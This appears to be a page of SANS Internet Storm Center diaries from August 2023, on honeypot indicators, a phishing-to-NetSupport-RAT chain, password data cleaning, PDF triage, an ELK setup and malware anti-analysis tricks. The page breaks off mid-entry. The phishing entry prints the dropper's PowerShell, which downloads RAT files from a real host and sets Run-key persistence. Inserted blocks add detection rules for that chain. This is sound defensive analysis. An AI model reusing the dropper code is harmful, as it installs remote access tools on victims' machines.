SANS


SystemBC Malware Activity , (Sun, Aug 20th)
This month, my DShield sensor captured this request for the first time: /systembc/password.php. I checked back over the past 6 months and only noticed this request 5 times, all of them this month, from 4 different sources. According to some references, this is likely the SystemBC Remote Access Trojan (RAT). All 4 IPs are part of the Digital Ocean ASN, and only one has been reported as likely malicious. Several samples have been reported to Any.run this month.
To verify whether something had changed, I reviewed DShield log submissions for the past year and noticed nothing really significant until the beginning of Jan 2023 for this directory. However, starting on the 3rd of Aug 2023, there was a significant change in the daily report for this directory, going from an average of 30 submissions to 445, and hovering in the hundreds since then.[1]
Indicators of Compromise
170.64.155.243
161.35.62.73
165.22.160.237
178.128.79.70
/systembc/password.php
/upl.php
[1] https://isc.sans.edu/weblogs/urlhistory.html?url=%2Fsystembc%2Fpassword.php
[2] https://isc.sans.edu/diary/Excel+spreadsheets+push+SystemBC+malware/27060
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
[4] https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6
[5] https://bazaar.abuse.ch/sample/964a9d8fbfd1886a93c1c09493db044bd37e517c4def61aa779c8734cb5cd68d/
[6] https://any.run/malware-trends/systembc
[7] https://www.virustotal.com/gui/ip-address/178.128.79.70/detection
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
From a Zalando Phishing to a RAT, (Fri, Aug 18th)
Phishing remains a lucrative threat. We get daily emails impersonating well-known brands (like DHL, PayPal, Netflix, Microsoft, Dropbox, Apple, etc.). Recently, I received a bunch of phishing emails targeting Zalando customers. Zalando is a German retailer of shoes and fashion across Europe. It was the first time that I saw them used in a phishing campaign.
The attached archive contains a single JavaScript file:
remnux@remnux:/MalwareZoo/20230816$ zipdump.py nine-life1107.zip
Index Filename         Encrypted Timestamp
    1 nine-life1107.js         0 2023-08-15 12:23:08
As usual with this language, the script is pretty well obfuscated. Here is an example of an implemented function:
(function (E, i) { var hw = { E: '0x264', i: 'XgQW', u: '0x246', z: 'OMHH', S: '0x211', L: '4[3N', T: '0x1ae', f: '@(sj', R: '0x230', Q: '8JTc', g: '0x1c0', n: '$GmP', d: 'CgxP', l: '0x1dc', W: 'Q9Z5', c: '0x1a9', x: '90vH' }; var s = Y; var J = Y; var o = Y; var V = Y; var D = Y; var u = E(); while (!![]) { try { var z = -parseInt(s(hw.E, hw.i)) / 0x1 + parseInt(J(hw.u, hw.z)) / 0x2 * (parseInt(J(hw.S, hw.L)) / 0x3) + -parseInt(o(hw.T, hw.f)) / 0x4 * (parseInt(s(hw.R, hw.Q)) / 0x5) + parseInt(V(hw.g, hw.n)) / 0x6 + -parseInt(V('0x22f', hw.d)) / 0x7 + parseInt(D(hw.l, hw.W)) / 0x8 + -parseInt(o(hw.c, hw.x)) / 0x9; if (z === i) { break; } else { u['push'](u['shift']()); } } catch (S) { u['push'](u['shift']()); } } }(y, 0x75686));
Diving into the code to spot interesting strings or techniques is always worthwhile. The script contains some references to "WScript" to call the method "ShellExecute", so we are dealing with a Windows script. The script is a dropper and will drop/execute a PowerShell script:
C:\Users\user01\AppData\Roaming\42c0tyi.ps1
The script is less heavily obfuscated and easy to understand. It uses bitsadmin.exe, the well-known LOLbin, to download many files from a website. Well, not always bitsadmin.exe: the same functionality can be called directly from PowerShell. That's what the attacker is testing in this case: the script checks whether the Start-BitsTransfer and Expand-Archive cmdlets are available inside PowerShell and uses them. Otherwise, it launches the standalone executable and downloads the files one by one:
$g3tSp4=Get-Command expand-archive -ErrorAction SilentlyContinue;
$PsaB17=Get-Command Start-BitsTransfer -ErrorAction SilentlyContinue;
if ($g3tSp4) {
    if ($PsaB17) { Start-BitsTransfer -Source $l1kps4 -Destination $p47Spa; } else { Invoke-Expression -Command $sPaad };
    expand-archive -path $p47Spa -destinationpath $SP4z3p;
    Remove-Item -path $p47Spa;
} else {
    $f1lePsa=@('AudioCapture.dll', 'client32.exe', 'client32.ini', 'HTCTL32.DLL', 'msvcr100.dll', 'nskbfltr.inf',
               'NSM.LIC', 'pcicapi.dll', 'PCICHEK.DLL', 'PCICL32.DLL', 'remcmdstub.exe', 'TCCTL32.DLL');
    $l1kps42='https://tukudewe.com/js/h3b2_jsg/';
    New-Item -Path $env:APPDATA -Name $sP4k3 -ItemType 'directory';
    if ($PsaB17) {
        $f1lePsa | ForEach-Object { $sp4suR=$l1kps42+$_; $spaD3s7=$SP4z3p+'\'+$_; Start-BitsTransfer -Source $sp4suR -Destination $spaD3s7; };
    } else {
        $f1lePsa | ForEach-Object { $sp4suR=$l1kps42+$_; $spaD3s7=$SP4z3p+'\'+$_; $sPaad2='bitsadmin.exe /transfer Spadow /download /priority normal '+$sp4suR+' '+$spaD3s7; Invoke-Expression -Command $sPaad2; };
    };
};
Another trick used in the script: files are downloaded into the directory C:\Users\REM\AppData\Roaming\MsEdgeSandbox, and the directory attributes are modified to hide it:
$H1foSp4=Get-Item $SP4z3p -Force; $H1foSp4.attributes='Hidden'; cd $SP4z3p;
Finally, persistence is implemented:
$p4t3hCl1=$SP4z3p+'\client32.exe'; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $sP4k3 -Value $p4t3hCl1 -PropertyType 'String';
The zip archive, the JavaScript, and the PowerShell script were not available on VT. What about the downloaded malware? Many files are downloaded onto the victim's computer, but the first one executed is "client32.exe" (SHA256:89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1), which has a low VT score of 5/71[1]. This malware is good old NetSupport Manager RAT[2]! No need to perform deep reverse engineering: the RAT configuration is available in the file client32.ini. The C2 server is jokosampbulid1[.]com:1412 (which was down when writing this diary).
The RAT files are downloaded from tukudewe[.]com.
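The chain above (BITS download into a hidden AppData directory, a PowerShell script dropped in AppData, a Run key pointing at client32.exe) is easy to hunt for in endpoint telemetry. The following is an added example, not code from the diary or from the malware: it runs three checks over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The job name "Spadow", the MsEdgeSandbox directory and the file names come from the script shown above; the URL host, the user name and the SID are constructed placeholders.

```python
import re

# Constructed Sysmon-style events modelled on the dropper's behaviour (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer Spadow /download /priority normal "
                    r"https://downloads.example.invalid/js/h3b2_jsg/client32.exe "
                    r"C:\Users\user01\AppData\Roaming\MsEdgeSandbox\client32.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Users\user01\AppData\Roaming\42c0tyi.ps1"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsEdgeSandbox",
     "Details": r"C:\Users\user01\AppData\Roaming\MsEdgeSandbox\client32.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /list /allusers"},   # benign admin use, must not fire
]

# Paths under a user's AppData, where the dropper stages everything.
APPDATA_PATH = re.compile(r"\\AppData\\(Roaming|Local)\\", re.IGNORECASE)
# bitsadmin.exe /transfer ... /download, or the PowerShell cmdlet the script prefers.
BITS_DOWNLOAD = re.compile(r"(bitsadmin(\.exe)?\s+/transfer\b.*/download\b|Start-BitsTransfer\b)",
                           re.IGNORECASE)
POWERSHELL_SCRIPT = re.compile(r"powershell(\.exe)?\b.*\.ps1\b", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)


def check_event(ev: dict) -> list:
    """Return the names of the rules that a single event triggers (possibly none)."""
    hits = []
    if ev.get("EventID") == 1:
        cmd = ev.get("CommandLine", "")
        # A BITS job whose destination is inside AppData: the download stage of the dropper.
        if BITS_DOWNLOAD.search(cmd) and APPDATA_PATH.search(cmd):
            hits.append("bits_download_to_appdata")
        # PowerShell executing a .ps1 that lives in AppData, like 42c0tyi.ps1 above.
        if POWERSHELL_SCRIPT.search(cmd) and APPDATA_PATH.search(cmd):
            hits.append("powershell_script_from_appdata")
    elif ev.get("EventID") == 13:
        # Run key value whose data points into AppData: the persistence stage.
        if RUN_KEY.search(ev.get("TargetObject", "")) and APPDATA_PATH.search(ev.get("Details", "")):
            hits.append("run_key_points_to_appdata")
    return hits


def scan(events: list) -> list:
    """Run check_event over a list of events and return (event index, rule) pairs."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in check_event(ev):
            findings.append((idx, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule alone is noisy (software updaters also use BITS and Run keys); the value is in the three firing together for the same user within a short window.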
[1] https://www.virustotal.com/gui/file/89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1/detection
[2] https://www.netsupportmanager.com
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Friday, August 18th, 2023 https://isc.sans.edu/podcastdetail/8622, (Fri, Aug 18th)
ISC Stormcast For Thursday, August 17th, 2023 https://isc.sans.edu/podcastdetail/8620, (Thu, Aug 17th)
Command Line Parsing - Are These Really Unique Strings?, (Thu, Aug 17th)
There are occasions where data needs to be cleaned prior to use. One example came to me while reviewing passwords submitted to one of my DShield honeypots. There appeared to be duplicate passwords, even when I attempted to export unique values from the command line.
# read cowrie JSON files in /logs/ directory
#   cat /logs/cowrie.json.*
# select data where password key is present
#   jq 'select(.password)'
# return password data in raw format (without quotes)
#   jq -r .password
# sort the data alphabetically
#   sort
# deduplicate the data and store in a text file
#   uniq > 2023-08-15_unique_passwords_raw.txt
cat /logs/cowrie.json.* | jq 'select(.password)' | jq -r .password | sort | uniq > 2023-08-15_unique_passwords_raw.txt
Figure 1: Output of exported data showing what appear to be duplicate values
In the example above, it would appear that "123456" is displayed three times in the exported text, even after attempting to remove duplicates from the resulting file. Since the project being worked on involved comparing data using Python, it seemed like a good idea to use Python to compare these values.
passwords = []
passwords_bytes = []

# read data from text file into passwords list
with open("2023-08-15_unique_passwords_raw.txt", "r", encoding="utf-8") as file:
    for line in file:
        passwords.append(line)

# read data from text file as bytes into passwords_bytes list
with open("2023-08-15_unique_passwords_raw.txt", "rb") as file:
    for line in file:
        passwords_bytes.append(line)

# print passwords beginning with "123456"
for index, password in enumerate(passwords):
    if password[:6] == "123456":
        print(index, password, passwords_bytes[index])
Figure 2: Comparing bytes data with Python shows additional formatting data
Now the differences between the values are clear when looking at the Python bytes output. This was not easy to recognize when using the "cat" defaults:
- \n - newline / line feed; this was anticipated in a text file with one item per line
- \t - tab
- \r - carriage return (returns to the beginning of the same line)
There are also some "cat" [1] options to highlight the same information.
cat -A 2023-08-15_unique_passwords_raw.txt | grep -a ^123456 | head -n 20
123456$
123456^I$
123456^M$
123456!$
123456! $
123456! $
123456!!$
123456!!!$
123456!!@@##$
123456!@$
123456!@ $
123456!@#$
123456!@#"$
123456#$
123456#@!$
123456&$
123456&*$
123456&*($
123456&*()$
123456*$
Using the -A option gives comparable output:
- $ - newlines
- ^I - tab
- ^M - carriage return
An additional option is to use the "od" command, which gives output just like the Python bytes output.
Figure 3: Output of "od" command showing extra string formatting
Some of this data can also be removed easily. An example from the terminal to remove tabs and carriage returns [2]:
cat 2023-08-15_unique_passwords_raw.txt | grep -a ^123456 | head -n 20 | tr -d "\t" | tr -d "\r" | uniq
123456
123456!
123456!
123456!
123456!!
123456!!!
123456!!@@##
123456!@
123456!@
123456!@#
123456!@#"
123456#
123456#@!
123456&
123456&*
123456&*(
123456&*()
123456*
Knowing a bit more about exactly what was happening also helped me compare the data in a different way.
Figure 4: Password hashes of data compared with passwords in Python bytes
My original goal was to hash all of the unique honeypot passwords that I have collected and compare them with data in HaveIBeenPwned [3]. Upon reviewing the data in more detail, another option presented itself: the bytes data could also be used directly with hashlib.
Figure 5: Comparison of password hashes when using utf-8 or bytes data from a text file of passwords
This is not ideal since the newlines are undesired, but it gives another path when processing the data. Just a good reminder that while values look unique, they may not be. It's helpful to explore data and see if any data cleaning is necessary. In my case, more cleaning is needed.
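The cleaning, deduplication and hashing steps above, put together as an added example (this is not the diary's own script). It works on constructed lines that reproduce what cat -A showed: the same password exported three times, once with a trailing tab and once with a trailing carriage return. The SHA-1 split into a 5-character prefix and 35-character suffix is the format the Pwned Passwords range API uses; the range response embedded here is constructed so the block runs offline.

```python
import hashlib

# Constructed lines mirroring the diary's export (not the real honeypot data).
RAW_LINES = [
    b"123456\n",
    b"123456\t\n",
    b"123456\r\n",
    b"123456!\n",
    b"123456! \n",   # trailing space is kept: it may be a genuine part of the credential
]


def clean_line(line: bytes) -> bytes:
    """Strip the line terminator plus the tab and CR debris; nothing else is touched."""
    return line.rstrip(b"\n").replace(b"\t", b"").replace(b"\r", b"")


def unique_passwords(lines) -> dict:
    """Count each cleaned value, so a 'unique' export that still collides becomes visible."""
    counts = {}
    for line in lines:
        pw = clean_line(line)
        counts[pw] = counts.get(pw, 0) + 1
    return counts


def sha1_hex(data: bytes) -> str:
    """Hash raw bytes; b'123456\\n' and b'123456' give different digests, which is the point."""
    return hashlib.sha1(data).hexdigest().upper()


def hibp_parts(pw: bytes) -> tuple:
    """Split the SHA-1 the way the range API expects: only the prefix leaves the machine."""
    digest = sha1_hex(pw)
    return digest[:5], digest[5:]


def match_in_range(suffix: str, range_response: str) -> int:
    """Look the suffix up in a 'SUFFIX:COUNT' range response; 0 when it is not listed."""
    for entry in range_response.splitlines():
        entry = entry.strip()
        if not entry:
            continue
        candidate, count = entry.split(":")
        if candidate.upper() == suffix.upper():
            return int(count)
    return 0


# Constructed stand-in for the body returned for the prefix of "123456"; the count is made up.
SAMPLE_RANGE = (
    "0123456789ABCDEF0123456789ABCDEF012:3\r\n"
    "D09CA3762AF61E59520943DC26494F8941B:42\r\n"
)


if __name__ == "__main__":
    for pw, n in unique_passwords(RAW_LINES).items():
        prefix, suffix = hibp_parts(pw)
        print(pw, n, prefix, match_in_range(suffix, SAMPLE_RANGE))
```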
[1] https://www.cyberciti.biz/faq/linux-unix-appleosx-bsd-cat-command-examples/
[2] https://www.cyberciti.biz/faq/how-to-remove-carriage-return-in-linux-or-unix/
[3] https://haveibeenpwned.com/Passwords
--
Jesse La Grew
Handler
A Gentle Reminder: The Evolving Nature of Digital Scams, (Wed, Aug 16th)
Considering the global turbulence from destabilizing events such as physical conflicts, freak weather and pandemics, financial wealth has never been more critical for a nation and its citizens so that daily life can continue. Money is needed for daily necessities such as food, medication, appropriate clothing and fuel. When faced with unexpected events such as retrenchment and newly detected health issues, citizens would also have to tap on the monetary buffer that should have been built up during less challenging times. Considering the current state of international affairs and employment prospects, one potential way to disrupt a nation’s peace and stability could be stealing their citizens’ monetary savings via financial scams and fraud.
Unlike conventional cyber-attacks such as phishing, where adversaries aim to harvest credentials to gain access to accounts, digital scams bypass the harvesting of credentials and instead attempt to convince the victim to authenticate and part with their assets directly. A multitude of factors could cause this change. For example, end users have gotten savvier about phishing attacks and stopped interacting with messages that try to masquerade as a well-known entity (e.g. shipping companies/social media sites). Applications could also have implemented additional security controls such as two-factor authentication (2FA), preventing adversaries from directly using credentials to authenticate with the target application. The main issue is that adversaries are likely to employ some means to wire away a victim’s hard-earned money and keep on doing so should these tactics be successful.
There have been a few notable case studies where adversaries do not simply send phishing messages but also prey on victims’ psychological weaknesses and informational blind spots. I was made aware of such an incident, reported to me privately about 60 hours ago, where an adversary attempted to masquerade as a charitable organization. In this particular incident, the charitable organization had a legitimate event that had actually been scheduled. There were also corresponding marketing materials with Quick Response (QR) codes embedded in the posters. Participants could register for the event by donating any amount via the QR code (using the local Singapore QR code payment system) and sending the receipt to a number shown on the poster. Most event details were correct; even the e-mail address shown was legitimate. However, upon closer inspection and after some analysis, it was determined that the actual event had already been held, and the QR code used for payments pointed to an account not affiliated with the charitable organization. Meanwhile, the “semi-fictitious” event had been circulated via popular messaging platforms such as Telegram. It is unclear if anyone made any payments to the monetary account that the scammer set up, but the original message had been removed.
Another recent attack that led to victims losing their money was the installation of third-party mobile applications that were not downloaded from legitimate and trusted mobile application stores. For example, in this unfortunate incident, the victim was left with only about US$2.95 (S$4) in the bank account after unknowingly installing a purported update to a mobile application [1]. The Federal Bureau of Investigation (FBI) also issued a Public Service Announcement (PSA) about cyber criminals targeting victims through mobile beta-testing applications, which could lead to monetary losses [2]. This was also highlighted in the Wednesday, August 16th 2023, SANS Internet Storm Center Stormcast [3].
Security controls can only do so much in preventing such unfortunate incidents. Due to financial challenges, not everyone can afford the latest phones, which may come with promised security support. Depending on the vendor, certain phones may not even receive timely security patches, and adversaries could tap into those vulnerabilities to perpetuate their digital scams. It could also be user-induced, due to the removal of security controls designed to secure phones (e.g. rooting (for Android) or jail-breaking (for iOS)). There is room for research on possible ways to disrupt and deny adversaries who perpetuate such digital scams while factoring in current technical limitations and scenarios. However, without any technological implementation, awareness of these digital scams is paramount as a first step towards foiling such attacks. While such attack techniques may seem trivial to cybersecurity professionals, since we are aware of such dangers, other individuals may not fully understand the potential dangers of such digital scams. It would be worthwhile to consider having conversations and raising awareness about these digital scams in your organization and among friends and family.
References:
1. https://www.asiaone.com/singapore/only-4-left-single-mum-loses-28k-after-phone-gets-hacked-realises-she-has-2-chromes
2. https://www.ic3.gov/Media/Y2023/PSA230814
3. https://isc.sans.edu/podcastdetail.html?podcastid=8618
-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter
ISC Stormcast For Wednesday, August 16th, 2023 https://isc.sans.edu/podcastdetail/8618, (Wed, Aug 16th)
ISC Stormcast For Tuesday, August 15th, 2023 https://isc.sans.edu/podcastdetail/8616, (Tue, Aug 15th)
PDFiD: False Positives Revisited, (Mon, Aug 14th)
10 years ago I wrote the blog post "PDFiD: False Positives" to talk about false positives generated by my tool pdfid.py.
pdfid.py is a triage tool: it's essentially a "string search tool" that looks for certain keywords, without parsing the document's PDF structure.
One of the keywords it looks for is /JS, which indicates the presence of JavaScript. And since /JS is a short string, it can happen that PDF documents contain that character sequence (/JS) somewhere inside a binary stream, with a totally different meaning. In that case, it's not a keyword, but just a byte sequence found inside a binary stream (for example, a JPEG image).
So that's a false positive, because it is not an indicator for the presence of JavaScript.
10 years ago, I advised using pdf-parser to search for those sequences.
From time to time, people still ask me about these false positives, so it's worth writing a revisited diary entry about this.
If you have a PDFiD detection for a short string like /JS:
And you can't find it with pdf-parser.py:
Then use pdf-parser's option -a to calculate statistics:
If the /JS detection is a false positive, then it will not appear in pdf-parser's statistics: that's because pdf-parser is a PDF parser, and can distinguish between keywords found in the right place (/JS inside a dictionary) and the wrong place (/JS inside a binary stream).
Notice that it's best to use option -a together with -O, because then stream objects (/ObjStm) will also be parsed:
And just for reference, this is how the output of pdfid and pdf-parser looks with true positives:
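To make the difference between the two tools concrete, here is an added example (not pdfid.py or pdf-parser.py themselves) that runs the same /JS search twice over a constructed minimal PDF: once over the raw bytes, the way a string search sees the file, and once after blanking every stream ... endstream body, which is the effect of only counting names found in dictionaries. The toy does not decompress /ObjStm object streams, which is exactly why the diary recommends -a together with -O on real files.

```python
import re

# Constructed minimal PDF (not a sample from the diary): object 2 really carries JavaScript,
# while object 3 is a JPEG-like binary stream that happens to contain the bytes "/JS".
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n"
    b"3 0 obj\n<< /Type /XObject /Subtype /Image /Filter /DCTDecode /Length 12 >>\nstream\n"
    b"\xff\xd8/JS\x00\x01\x02\x03\x04\x05\x06\n"
    b"endstream\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# "/JS" not followed by an alphanumeric, so a longer name such as /JScript is not counted
# (and /JavaScript never matches, because "/Ja" is not "/JS").
JS_NAME = re.compile(rb"/JS(?![A-Za-z0-9_])")
# A stream body runs from the "stream" keyword (plus EOL) to the next "endstream".
STREAM_BODY = re.compile(rb"stream\r?\n.*?endstream", re.DOTALL)


def count_js_like_pdfid(data: bytes) -> int:
    """Plain string search over the whole file: this is where the false positive comes from."""
    return len(JS_NAME.findall(data))


def count_js_outside_streams(data: bytes) -> int:
    """Same search after blanking every stream body, so only names in dictionaries remain."""
    stripped = STREAM_BODY.sub(b"stream\nendstream", data)
    return len(JS_NAME.findall(stripped))


def classify(data: bytes) -> dict:
    """Summarise both counts; the difference is the number of /JS hits that were not keywords."""
    naive = count_js_like_pdfid(data)
    structural = count_js_outside_streams(data)
    return {"pdfid_style": naive, "outside_streams": structural, "false_positives": naive - structural}


if __name__ == "__main__":
    print(classify(SAMPLE_PDF))
```

A real stream may legitimately contain the bytes "endstream" too, so a production parser uses /Length rather than searching for the end keyword; for triage the approximation above is enough to show which hits deserve a look.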
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com
ISC Stormcast For Monday, August 14th, 2023 https://isc.sans.edu/podcastdetail/8614, (Mon, Aug 14th)
DShield Sensor Monitoring with a Docker ELK Stack [Guest Diary], (Sat, Aug 12th)
[This is a Guest Diary by Scott Jensen]
Using an ELK (Elasticsearch, Logstash, Kibana) or Elastic Stack is a great way to get a high-level view of what is being seen by your DShield [1] honeypot.
For those who don’t already have a dedicated ELK stack, or are just looking for a way to monitor your honeypot from a separate device (in my case, I didn’t want to put more holes in my internal firewall), follow this step-by-step guide to get up and running quickly.
First off, we need to configure the honeypot to ship its logs with an ELK beat; if you want a great guide on collecting all the logs, see this diary [2] posted on the ISC page.
This is an ELK (Elasticsearch, Logstash, Kibana) stack that is set up to monitor logs from a DShield honeypot.
It is put together using the Getting started with the Elastic Stack and Docker-Compose [3] project with Ubuntu Linux live server 22.04 and the Install & Configure Filebeat on Raspberry Pi ARM64 to Parse DShield Sensor Logs [2] diary. The only change is to edit filebeat.yml to send to the IP address of the device you intend to run Dshield-ELK [4] on.
Dshield-ELK assumes the following prior to starting:
- A running DShield Honeypot [1]
- Docker (tested on Ubuntu 20.04 LTS running Docker version 24.0.5, but this should work on any platform)
- Confirm the DShield sensor can reach the Logstash port TCP 5044. This port will not be reachable until docker compose has been set up.
Steps
1. Set up filebeat per Install & Configure Filebeat on Raspberry Pi ARM64 to Parse DShield Sensor Logs [2], up to the Setup Logstash Collection & Parsing section.
2. Install Docker as follows [3]:
- $ sudo apt-get install ca-certificates curl gnupg
- $ sudo install -m 0755 -d /etc/apt/keyrings
- $ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
- $ sudo chmod a+r /etc/apt/keyrings/docker.gpg
- $ echo "deb [arch="$(dpkg --print-architecture)" signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu "$(. /etc/os-release && echo "$VERSION_CODENAME")" stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
- $ sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
3. Clone Dshield-ELK[4] to the /home user directory.
- $ sudo apt-get install git
- $ git clone https://github.com/fkadriver/Dshield-ELK.git
4. Change to the DShield-ELK directory.
- $ cd ~/DShield-ELK
5. Change any environment variables in .env (a hidden file). Any editor can be used (e.g. vi, vim, nano), but I recommend nano if you are not familiar with another editor.
- $ nano .env (note the '.' at the front of .env)
Recommend changing at least:
- ELASTIC_PASSWORD is the password that is used for administrative access to both Elastic and Kibana
- KIBANA_PASSWORD is only used as the internal password for Kibana to communicate to Elastic
Optional
- STACK_VERSION is the version of Elastic used in this stack. The build has been tested with 8.8.2, but any version should work
- DNS_SERVER is a list of DNS server(s) used in the filters. The default setup in each filter is to use whatever DNS settings are defined on the host. If you want to use specific DNS server(s), change the DNS_SERVER variable and uncomment the # nameserver lines in the following files:
- logstash-200-filter-cowrie.conf: line 115
- logstash-202-filter-cowrie-sqlite.conf: line 284
- logstash-300-filter-iptables.conf: line 63
Memory limits are the most memory that Docker will allocate for each of the ELK containers. They default to 1073741824 (1 GB) but can be raised if you have the resources:
- ES_MEM_LIMIT: Elastic Memory
- KB_MEM_LIMIT: Kibana Memory
- LS_MEM_LIMIT: Logstash memory
6. Save the .env file to the same location
- If using nano, ^o and then ^x
7. Once the project and any setting changes (if applicable) have been completed, it is time to bring up the stack. This will take a few minutes, especially if you have not previously pulled the Elastic images.
- $ sudo docker compose up -d (the -d is optional, but without it, when you close the prompt or stop the command the containers will shut down). See Overview of docker compose CLI [5] for more information about the docker compose command
8. Open a browser and confirm that the following ports are reachable on your host:
- 5601: Kibana
- User: elastic
- Password: ${ELASTIC_PASSWORD}
- http://localhost:5601 (this can also be http://IP:5601 for remote access)
- 9200: Elastic
- User: elastic
- Password: ${ELASTIC_PASSWORD}
- Since version 8, the connection to Elasticsearch is secured with a self-signed certificate, so you will have to use https://localhost:9200. (You will likely be warned about an insecure or self-signed certificate. This is expected.)
9. Logstash will also be running on port 5044
- 5044: Logstash
- This is set up to receive any beats input, but only has filters and output for the cowrie* logs from the diary [2].
- Additional filters can be added to the logstash/pipeline directory.
10. Connect to Kibana on port 5601 (http://localhost:5601) using the user elastic and the password ${ELASTIC_PASSWORD} from the .env file.
11. If everything worked, you should be able to open the [Logs DShield Sensor] Overview dashboard.
After you first log in, import the DShield dashboard from this source [7]; in Kibana, go to:
- Management
- Stack Management
- Kibana
- Saved Objects
- select Import and import dshield_sensor_8.71.ndjson
Now you should see, under Kibana Data Views, a mapping to the 3 cowrie* tables. Go back to Dashboard and open [Logs DShield Sensor] Overview to confirm that filebeat and logstash are parsing your data.
12. Here is a snip of the dashboard over the past 24 hours.
13. After a reboot, restart the DShield ELK stack with:
- $ cd ~/Dshield-ELK
- $ sudo docker compose start
- $ sudo docker compose ps
For any updates, check out Scott Jensen's github site.
[1] https://isc.sans.edu/tools/honeypot/
[2] https://isc.sans.edu/diary/Install+Configure+Filebeat+on+Raspberry+Pi+ARM64+to+Parse+DShield+Sensor+Logs/30056
[3] https://docs.docker.com/engine/install/ubuntu/
[4] https://github.com/fkadriver/Dshield-ELK
[5] https://docs.docker.com/compose/reference/
[6] https://docs.docker.com/engine/security/rootless/
[7] https://handlers.sans.edu/gbruneau/elk/DShield/dshield_sensor_8.71.ndjson
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Show me All Your Windows!, (Fri, Aug 11th)
It's a key point for attackers to implement anti-debugging and anti-analysis techniques. Anti-debugging means the malware will try to detect if it's being debugged (executed in a debugger, or its execution is slower than expected). Anti-analysis refers to techniques to detect if the malware is being detonated in a sandbox or by a malware analyst. In such cases, tools run in parallel with the malware to collect live data (packets, API calls, files, or registry activity).
The Microsoft API set is fantastic because it contains many API calls that are helpful for attackers. Today I found a malicious Python script that (ab)uses one of them: GetWindowText()[1]. This API call is very powerful when used in combination with EnumWindows()[2]. EnumWindows() will list all top-level windows opened on the screen and pass the handle of each window to a callback function, which checks the window title via GetWindowText().
That's what has been implemented in the Python script:
The script uses the ctypes library to call Windows API functions. EnumWindows() is called in a loop; for each window found, the callback function winEnumHandler() is called. The window title is extracted and compared to a nice list of well-known tools used by malware analysts.
The malware will not silently exit if a suspicious window is found. Instead, it will link the process to the window and try to kill it using GetWindowThreadProcessId()[3]!
Another good example of a group of API calls that reveals a specific technique used by attackers! The script (SHA256:c8a5262e89751f231060a6740447062e34c5393a17f67d0c4eb52c7f911f3bd2) has a VT score of 6/60[4].
[1] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowtexta
[2] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows
[3] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowthreadprocessid
[4] https://www.virustotal.com/gui/file/c8a5262e89751f231060a6740447062e34c5393a17f67d0c4eb52c7f911f3bd2
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Friday, August 11th, 2023 https://isc.sans.edu/podcastdetail/8612, (Fri, Aug 11th)
Some things never change - such as SQL Authentication "encryption", (Thu, Aug 10th)
Fat client applications running on (usually) Windows are still extremely common in enterprises. When I look at internal penetration tests or red team engagements for any larger enterprise, it is almost 100% guaranteed that one will stumble upon such an application.
These fat client applications have also usually been written many, many years ago, when security was maybe not one of the primary requirements. Whenever one encounters such a fat client application, or if it is part of your penetration test, one of the primary goals is to analyze how the application communicates with the rest of the world (or, usually, with other internal systems).
While modern applications that you might encounter will most of the time consume some web services (usually SOAP, but I can see modern RESTful interfaces being consumed more and more), “traditional” fat client applications will most of the time connect directly to a database (again, since we’re looking primarily at Windows environments here, this will most of the time be a Microsoft SQL Server database). Such a setup is quite simple and is shown in the following figure:
The first step in identifying such an application will usually be to inspect its network traffic. In 99% of cases, this is trivial to perform with a tool such as Wireshark. This allows us not only to identify the target MS SQL Server, but also to inspect traffic on the wire. We will be looking for any traffic with the destination TCP port set to 1433.
Again, due to the age of such applications, in almost every case I worked on, the data on the wire is sent in plain text, without any encryption. This is, obviously, very bad, as we could easily perform a MitM attack (see more below), but the TDS protocol will, luckily, have one step encrypted: authentication.
SQL Server Authentication
Microsoft SQL Server supports two authentication types: the built-in Windows authentication as well as SQL Server authentication. This second authentication mechanism is interesting to us, and is used by the majority of fat client applications (at least those that I tested).
The workflow will look like this:
